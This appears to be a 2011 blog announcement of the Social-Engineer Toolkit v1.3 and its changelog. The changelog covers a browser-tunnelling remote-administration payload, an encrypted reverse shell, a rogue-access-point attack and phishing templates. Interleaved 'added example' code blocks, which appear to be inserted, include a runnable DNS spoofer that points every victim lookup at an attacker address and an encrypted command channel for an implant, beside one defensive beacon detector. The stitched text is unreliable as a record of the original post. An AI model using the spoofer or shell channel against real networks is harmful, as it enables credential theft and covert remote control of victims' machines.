March 28, 2011
Thursday, 8:00PM EST, ISDPodcast LIVE, SET v1.3 being released.
Written by
David Kennedy
Security Testing & Analysis
Social Engineering
The Social-Engineer Toolkit (SET) v1.3 "Artillery Edition" will be released on Thursday, March 31st 2011 at 8:00PM EST, live on the ISDPodcast. You won't want to miss it; follow the ISDPodcast crew on Twitter for updates on what's being released, and there are a couple of additional surprises coming. Be sure to listen live to the ISDPodcast on Thursday for the download details and how to update!
This version of the Social-Engineer Toolkit is one of my favorite releases, as it introduces several new features, payloads, and attack vectors. I've spent a significant amount of time working on this release and can say it's one of the most stable and thoroughly redesigned versions to date. I've pretty much exhausted and reimplemented socket handling within Python, which I didn't think would be possible. One of the major highlights is that Thomas Werth, best known for his Java Applet within SET, is now an official developer on the toolkit. Thomas has done an amazing job contributing to SET, and including him as one of the developers was a natural evolution. In this release Thomas has contributed the Remote Administration Tool Tommy Edition (RATTE) payload module, which is integrated into SET. RATTE tunnels all of its communications through a hijacked Internet Explorer or Firefox instance, using whatever proxy settings that browser already has, so its traffic leaves the network the same way the user's own web browsing does. The payload gives you the option to drop into a shell, upload and download files, log keystrokes, and more. Because the traffic rides on the browser's own proxied HTTP session, it passes the egress filtering and firewall rules that let that browser out, which is the control most environments rely on today. This is an extremely powerful tool and an awesome addition to SET.
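The defensive flip side of RATTE is that a payload which leaves through the browser's proxy settings is visible in the proxy log, and a remote-administration channel polls its operator on a timer that normal browsing does not. The following is an added example, not SET's or RATTE's code: it parses constructed Squid-format access.log lines (not real traffic) and flags client/host pairs whose request gaps are almost constant. The field layout, the thresholds (`min_hits`, `max_cv`) and all addresses are assumptions chosen for the illustration.

```python
"""Flag hosts that are polled at near-constant intervals through the web proxy."""
import statistics
from collections import defaultdict
from urllib.parse import urlparse

# Constructed Squid native access.log lines (not real traffic). Fields: unix timestamp,
# elapsed ms, client IP, result/status, bytes, method, URL, user, hierarchy/peer, content-type.
SAMPLE_LOG = """\
1301356800.101    120 10.0.0.5 TCP_MISS/200 5120 GET http://www.example.com/index.html - DIRECT/93.184.216.34 text/html
1301356801.220     45 10.0.0.7 TCP_MISS/200 742 POST http://update.example.net/check - DIRECT/203.0.113.9 text/plain
1301356803.500     80 10.0.0.5 TCP_HIT/200 2300 GET http://www.example.com/style.css - NONE/- text/css
1301356840.900    200 10.0.0.5 TCP_MISS/200 9800 GET http://www.example.com/news - DIRECT/93.184.216.34 text/html
1301356842.010     30 10.0.0.5 TCP_MISS/304 0 GET http://cdn.example.org/logo.png - DIRECT/198.51.100.4 image/png
1301356845.700    150 10.0.0.5 TCP_MISS/200 8700 GET http://www.example.com/news/2 - DIRECT/93.184.216.34 text/html
1301356861.301     44 10.0.0.7 TCP_MISS/200 742 POST http://update.example.net/check - DIRECT/203.0.113.9 text/plain
1301356921.180     46 10.0.0.7 TCP_MISS/200 742 POST http://update.example.net/check - DIRECT/203.0.113.9 text/plain
1301356981.250     45 10.0.0.7 TCP_MISS/200 742 POST http://update.example.net/check - DIRECT/203.0.113.9 text/plain
1301357041.300     44 10.0.0.7 TCP_MISS/200 742 POST http://update.example.net/check - DIRECT/203.0.113.9 text/plain
"""


def parse_line(line):
    """Return (timestamp, client, host) for one Squid native-format line, or None if unparseable."""
    fields = line.split()
    if len(fields) < 7:
        return None
    try:
        ts = float(fields[0])
    except ValueError:
        return None
    host = urlparse(fields[6]).hostname
    if not host:
        return None
    return ts, fields[2], host


def find_beacons(log_text, min_hits=4, max_cv=0.1):
    """Group requests by (client, host) and flag pairs whose inter-request gaps
    have a coefficient of variation (stdev / mean) at or below max_cv, i.e. a
    steady timer rather than a human clicking around. Thresholds are assumptions."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            times[(rec[1], rec[2])].append(rec[0])

    findings = []
    for (client, host), ts in times.items():
        if len(ts) < min_hits:
            continue                      # too few samples to judge regularity
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.stdev(gaps) / mean
        if cv <= max_cv:
            findings.append({"client": client, "host": host, "hits": len(ts),
                             "mean_interval": round(mean, 2), "cv": round(cv, 4)})
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print("possible beacon: %(client)s -> %(host)s, %(hits)d hits every %(mean_interval)ss (cv %(cv)s)" % f)
```

In the constructed sample, 10.0.0.5 browses www.example.com at irregular gaps and is not flagged, while 10.0.0.7 posts to update.example.net every 60 seconds and is. A real deployment would add jitter-tolerant thresholds, exclude known update hosts, and feed the findings into the SIEM rather than printing them.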
In addition to RATTE, I've written a completely custom interactive SET shell that uses AES-256 encryption with a randomized cipher key exchange per connection. The payload is fully integrated into SET, can act as a reverse payload, and has capabilities such as dropping into a command shell, uploading and downloading files, reverse SSH port tunneling, and listing and killing processes. This is the first release of the interactive shell, and it will be a work in progress as SET continues to mature and grow.
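What "a randomized key per connection" should mean for a shell like this is that no session key ever crosses the wire and no two connections share one. The block below is an added example, not SET's interactive shell: it derives per-connection, per-direction keys from a pre-shared secret (assumed to be embedded in the generated payload) plus fresh nonces from both ends, frames each message with a sequence number and a MAC, and rejects replays and tampering. The Python standard library has no AES, so the body cipher here is an HMAC-SHA256 counter-mode keystream standing in for AES-256-CTR; the `PSK` value, the info string and the frame layout are assumptions, and a production build would swap the keystream function for AES-GCM from PyCrypto or `cryptography`.

```python
"""Per-connection session keys and authenticated framing for a reverse-shell channel."""
import hashlib
import hmac
import os
import struct

PSK = b"example-pre-shared-secret"   # assumption: baked into the generated payload, not sent


def hkdf(ikm, salt, info, length):
    """HKDF-SHA256 (RFC 5869): extract a PRK from the secret, then expand to `length` bytes."""
    prk = hmac.new(salt, ikm, hashlib.sha256).digest()
    okm, t, counter = b"", b"", 1
    while len(okm) < length:
        t = hmac.new(prk, t + info + bytes([counter]), hashlib.sha256).digest()
        okm += t
        counter += 1
    return okm[:length]


class Channel:
    """One end of an encrypted channel. Both ends derive identical keys from
    PSK + server_nonce + client_nonce; the nonces are the only thing sent in the clear."""

    def __init__(self, psk, my_nonce, peer_nonce, is_server):
        salt = (my_nonce + peer_nonce) if is_server else (peer_nonce + my_nonce)  # server||client
        keys = hkdf(psk, salt, b"set-shell-example-v1", 4 * 32)
        s2c_enc, s2c_mac, c2s_enc, c2s_mac = (keys[i * 32:(i + 1) * 32] for i in range(4))
        if is_server:
            self.send_keys, self.recv_keys = (s2c_enc, s2c_mac), (c2s_enc, c2s_mac)
        else:
            self.send_keys, self.recv_keys = (c2s_enc, c2s_mac), (s2c_enc, s2c_mac)
        self.send_seq = self.recv_seq = 0

    @staticmethod
    def _keystream(key, seq, n):
        # HMAC-SHA256 in counter mode stands in for AES-256-CTR (stdlib has no AES).
        out, block = b"", 0
        while len(out) < n:
            out += hmac.new(key, struct.pack("!QQ", seq, block), hashlib.sha256).digest()
            block += 1
        return out[:n]

    def seal(self, plaintext):
        """Frame = seq(8) | len(4) | body | HMAC-SHA256(seq|len|body)  (encrypt-then-MAC)."""
        enc, mac = self.send_keys
        body = bytes(a ^ b for a, b in zip(plaintext, self._keystream(enc, self.send_seq, len(plaintext))))
        hdr = struct.pack("!QI", self.send_seq, len(body))
        tag = hmac.new(mac, hdr + body, hashlib.sha256).digest()
        self.send_seq += 1
        return hdr + body + tag

    def open(self, frame):
        """Verify and decrypt one frame; raise ValueError on replay, truncation or tampering."""
        enc, mac = self.recv_keys
        if len(frame) < 12 + 32:
            raise ValueError("truncated frame")
        hdr, body, tag = frame[:12], frame[12:-32], frame[-32:]
        seq, n = struct.unpack("!QI", hdr)
        if n != len(body) or seq != self.recv_seq:
            raise ValueError("bad sequence or length (replay/reorder/truncation)")
        if not hmac.compare_digest(tag, hmac.new(mac, hdr + body, hashlib.sha256).digest()):
            raise ValueError("MAC failure")
        self.recv_seq += 1
        return bytes(a ^ b for a, b in zip(body, self._keystream(enc, seq, n)))


def handshake(psk=PSK):
    """Simulate both ends of one connection: each contributes a 32-byte random nonce."""
    server_nonce, client_nonce = os.urandom(32), os.urandom(32)
    server = Channel(psk, server_nonce, client_nonce, is_server=True)
    client = Channel(psk, client_nonce, server_nonce, is_server=False)
    return server, client


def rejects(chan, frame):
    """True if the channel refuses the frame (used to check replay/tamper handling)."""
    try:
        chan.open(frame)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    server, client = handshake()
    frame = server.seal(b"shell")               # operator asks the implant for a command shell
    print(client.open(frame), len(frame), "bytes on the wire")
    print("replay rejected:", rejects(client, frame))
```

Two things the example makes concrete that the feature list does not: the per-direction keys mean a frame captured from one side cannot be replayed at the other, and the sequence number in the MAC'd header means the same frame cannot be replayed on the same side either. The remaining weakness is the pre-shared secret itself, which anyone who pulls the payload off disk can extract; an ephemeral Diffie-Hellman exchange authenticated by that secret would close that gap.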
There is a new attack vector called the "Wireless Access Point Attack Vector", which uses airbase-ng (thanks Mister_X and Elwood) to create a rogue access point, spoof DNS, and hand out DHCP addresses, all automatically. Everything is launched in the background, and all HTTP traffic from clients of the rogue access point is redirected to your machine, where you can then launch any attack you want, for example the Java Applet Attack or the Multi-Attack vector. This new attack vector is a great evolution of SET and extends it to attacking victims over wireless.
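The piece of this vector that does the redirecting is the DNS spoofing: once a client has taken a DHCP lease from the rogue access point, every name it looks up resolves to the attacker, so whatever site it opens lands on the SET web server. The following is an added example, not SET's code and not dsniff's dnsspoof: a minimal responder that parses a single-question DNS query and answers every A/IN query with one address. `ATTACKER_IP`, the TTL and the listening address are assumptions; `serve()` needs root to bind UDP/53 and is not run on import.

```python
"""Answer every A query with the attacker's address, as dnsspoof does behind the rogue AP."""
import socket
import struct

ATTACKER_IP = "10.0.0.1"   # assumption: the rogue access point's own address


def parse_query(packet):
    """Return (txid, flags, qname, qtype, qclass, question_bytes) for a one-question query."""
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels, off = [], 12
    while True:
        ln = packet[off]
        off += 1
        if ln == 0:
            break
        if ln & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(packet[off:off + ln].decode("ascii"))
        off += ln
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return txid, flags, ".".join(labels), qtype, qclass, packet[12:off + 4]


def build_response(query, answer_ip=ATTACKER_IP, ttl=60):
    """Forge a response to an A/IN query; return None for anything else (leave it to the real resolver)."""
    txid, flags, qname, qtype, qclass, question = parse_query(query)
    if qtype != 1 or qclass != 1:
        return None
    rd = flags & 0x0100
    # QR=1, RD copied from the query, RA=1; 1 question, 1 answer, no authority/additional.
    header = struct.pack("!HHHHHH", txid, 0x8000 | rd | 0x0080, 1, 1, 0, 0)
    # Answer: name pointer to offset 12 (the question), type A, class IN, TTL, rdlength 4, address.
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(answer_ip)
    return header + question + answer


def build_query(name, qtype=1, txid=0x1234):
    """Build a standard recursive query for `name` (used here to exercise the responder offline)."""
    qname = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def answered_address(response):
    """Return (txid, flags, dotted IP) from the first answer of a response built above."""
    txid, flags = struct.unpack("!HH", response[:4])
    off = 12
    while response[off] != 0:                 # skip the question name
        off += 1 + response[off]
    off += 1 + 4                              # terminator + qtype/qclass
    _, rtype, rclass, _, rdlen = struct.unpack("!HHHIH", response[off:off + 12])
    if (rtype, rclass, rdlen) != (1, 1, 4):
        raise ValueError("not an A record")
    return txid, flags, socket.inet_ntoa(response[off + 12:off + 16])


def serve(bind_addr="0.0.0.0", port=53, answer_ip=ATTACKER_IP):
    """Listen on UDP/53 (requires root) and spoof every A query; ignore malformed packets."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_addr, port))
    while True:
        data, peer = sock.recvfrom(512)
        try:
            resp = build_response(data, answer_ip)
        except (ValueError, IndexError, UnicodeDecodeError, struct.error):
            continue
        if resp:
            sock.sendto(resp, peer)


if __name__ == "__main__":
    serve()
```

Answering only A/IN queries and passing everything else through keeps the client's resolver from stalling on AAAA or SRV lookups, which is the difference between a victim who lands on the attack page and one who gets a browser error and walks away.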
There were also a record number of community contributions in this version, including a new Teensy payload that specifically targets GNOME-based Linux systems and improvements to the multi-language support of the existing Teensy payloads.
In addition to the new attack vectors, there are a number of new templates in the spear-phishing attack vector, new exploits imported from Metasploit, bug fixes, and more.
Below is the full change log for SET v1.3. Please note that it will change slightly, as three additional features are near completion for Thursday's release:
~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~
* Updated the web-gui interface to reflect all new PDF exploits
* Updated the web-gui interface to reflect all new client-side exploits
* Added a new setup.py installer file for Debian-based systems only; manual install options will be added later
* Updated all of the PowerShell HID attack vectors to fix bugs and add multi-language support. Thanks padzero!
* Added AES encryption to the socket communication; it requires Crypto.Cipher from the PyCrypto library.
* Added python-crypto to the installer setup.py installation
* Fixed web-gui alignment on new options so they match up properly to SET-interface
* Added better error handling around the openssl python module if it isn't installed
* Added download_file capabilities to the SET interactive shell.
* Added upload_file capabilities to the SET interactive shell.
* Added shell capabilities to the SET interactive shell.
* Added ssh_tunneling capabilities to the SET interactive shell. You can tunnel any port you want over SSH.
* Added a Teensy GNOME wget payload, thanks to Hugo Caron (y0ug)!
* Fixed a bug where the Teensy payload's return-to-menu option would not return properly to the main menu
* Fixed a bug where the Mass Mailer menu didn't properly return to the main menu when specified.
* Added process list in the SET interactive shell.
* Added process kill in the SET interactive shell.
* Added dsniff to set_config as an option instead of ettercap; either one can be used.
* Added centralized logging in SET, log files will now be dumped to src/logs/set_logfile.log
* Added logging to main SET interface, handles main SET interactive shell errors
* Added logging to arp_cache.py file, handles arp cache errors
* Added logging to hijacking.py file, handles dll_hijacking errors
* Added logging to harvester.py file, handles credential harvesting errors
* Added logging to payloadgen.py file, handles payload generation errors
* Fixed a bug where if site wouldn't clone properly it would just exit SET, it now just returns back to main menu.
* Fixed a bug where the new addition to dnsspoof would not properly kill dnsspoof when exiting SET, it now terminates when an exception is thrown
* Added logging to web_server.py file, handles main SET web server errors
* Added logging to spawn.py file, handles main spawn handles for SET
* Added the ability to specify high priority during emails or not, thanks Jonathan Murray!
* Added a new core module library called log(error) which centralizes log messages through core function calls
* Added the new Sun Java Applet2ClassLoader Remote Code Execution Exploit from Frederic Hoguin and jduck that was recently added to Metasploit
* Moved version number to src/main/ instead of src root
* Added the new RATTE payload to SET, created by Thomas Werth to circumvent firewall-based restrictions. Awesome addition!
* Added the new DSNIFF changes to the web gui to ensure that when the option is enabled in set_config it now gets picked up in web gui
* Fixed a bug in web gui where if HTML/Plain wasn't specified, it would not properly run the answer file to launch the attack
* Added the SET interactive shell to the Java Applet Attack Vector on the SET web-gui
* Fixed mishandling of OSError exceptions in spawn.py which caused SET to print a pexpect exception error when the KeyboardInterrupt exception handler was triggered
* Deleted the database directory under src, was no longer needed
* Added the Sun Java Applet2ClassLoader Remote Code Execution by Frederic Hoguin and jduck to the web gui interface
* Added RATTE to the SET Web GUI under the payload selection area; it is only to be used with the Java Applet attack.
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability from the Metasploit Framework to SET
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability to the SET web gui.
* Added six more spear-phishing templates that can be found under the spear-phish attack menu
* Added a new attack vector called the SET Wireless Attack Vector; this creates a fake access point and redirects all traffic to you
* Added the ability to stop all services/processes started by the SET Wireless Attack Vector; it is now under the options menu
* Added Thomas Werth's RATTE module to the third-party modules as well as under the main payload section. A great example of how to tweak third-party modules and add things.
* Added airbase-ng to SET in case it is not installed. Thanks to Mister_X for the approval to include it in SET!
* Added the new wireless attack vector to the SET web GUI; menus have been changed slightly
* Added the new spear-phishing templates to the SET web GUI as well; they are under the spear-phish menu